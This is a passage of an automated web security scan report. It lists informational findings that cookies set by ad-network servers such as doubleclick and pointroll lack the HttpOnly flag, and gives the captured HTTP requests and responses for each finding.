GET /ad/N270.N270.EMEA_StratDev/B3867719.15;u=pid=%pid!;,aid=%eaid!;,cid=%ecid!;;sz=1x1;ord=9364091? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 03 Oct 2011 00:39:59 GMT
Location: http://s0.2mdn.net/viewad/2195126/4-1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cadfdd83c0000d7||t=1317602399|et=730|cs=002213fd48bae36ca9fa1ef88a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:39:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:39:59 GMT
Server: GFE/2.0
Content-Type: text/html

14.96. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
14.97. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
14.98. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3285.advertisingcom/B2343920.49

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000915323/cstr=23819479=_4e88fd24,7015322258,812164%5E915323%5E1184%5E0,1_/xsxdata=$xsxdata/bnum=23819479/optn=64?trg=;ord=7015322258? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4435
Set-Cookie: id=c15cfd83c000083||t=1317600590|et=730|cs=002213fd480e0d8c5cbf724fda; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:50 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:50 GMT
Date: Mon, 03 Oct 2011 00:09:50 GMT
Expires: Mon, 03 Oct 2011 00:09:50 GMT
Cache-Control: private

document.write('<!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n<script src=\"http://s0.2mdn.net/879366/
...[SNIP]...
14.99. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4359.advertising.comOX2601/B5797640.2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=78334226=_4e88fd23,1577287805,812162%5E1072156%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=78334226/optn=64?trg=;ord=1577287805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8491
Set-Cookie: id=ce2ced83c000015||t=1317600592|et=730|cs=002213fd48e3531570c028be26; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:52 GMT
Date: Mon, 03 Oct 2011 00:09:52 GMT
Expires: Mon, 03 Oct 2011 00:09:52 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Sep 16 16:30:33 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
14.100. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4610.153021.INTERCLICKNETWORK/B5581164.6;sz=160x600;click=http://a1.interclick.com/icaid/194896/tid/bc07e8b0-ee36-425c-ab65-77ee7d5dd2f6/click.ic?;ord=634531823360070511? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Set-Cookie: id=cc4c0d83c0000c2||t=1317600005|et=730|cs=002213fd48de979b12208ed0a7; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:05 GMT
Date: Mon, 03 Oct 2011 00:00:05 GMT
Expires: Mon, 03 Oct 2011 00:00:05 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Sep 07 14:26:44 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
14.101. http://ad.doubleclick.net/adj/gna.en/level2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gna.en/level2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/gna.en/level2;tile=1;sz=728x90;ord=940345?area=2l&pos=1&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 463
Set-Cookie: id=c2dc0d83c00000a||t=1317599968|et=730|cs=002213fd481295e253bf9da118; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:59:28 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:59:28 GMT
Date: Sun, 02 Oct 2011 23:59:28 GMT
Expires: Sun, 02 Oct 2011 23:59:28 GMT
Cache-Control: private

document.write('<iframe id=\'a61a57b3\' name=\'a61a57b3\' src=\'http://d.tradex.openx.com/afr.php?zoneid=6393&amp;cb=INSERT_RANDOM_NUMBER_HERE\' frameborder=\'0\' scrolling=\'no\' width=\'728\' height
...[SNIP]...
14.102. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;141652382;20702477;a?http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States
Set-Cookie: id=c9aced83c00000a|644190/486643/15250|t=1317600576|et=730|cs=002213fd4868e541ded676c08a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:36 GMT
Date: Mon, 03 Oct 2011 00:09:36 GMT
Server: GFE/2.0
Content-Type: text/html

14.103. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
14.104. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1861717&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13beg%2C15sx4"

Response

HTTP/1.1 200 OK
Set-Cookie: b="%3A%3A13wid%2C13beg%2C15sx4"; path=/; domain=.adbrite.com; expires=Tue, 02-Oct-2012 01:53:09 GMT
Set-Cookie: vsd=0@1@4e891585@ads.pubmatic.com; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 01:53:09 GMT
Content-Type: application/x-javascript
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 298

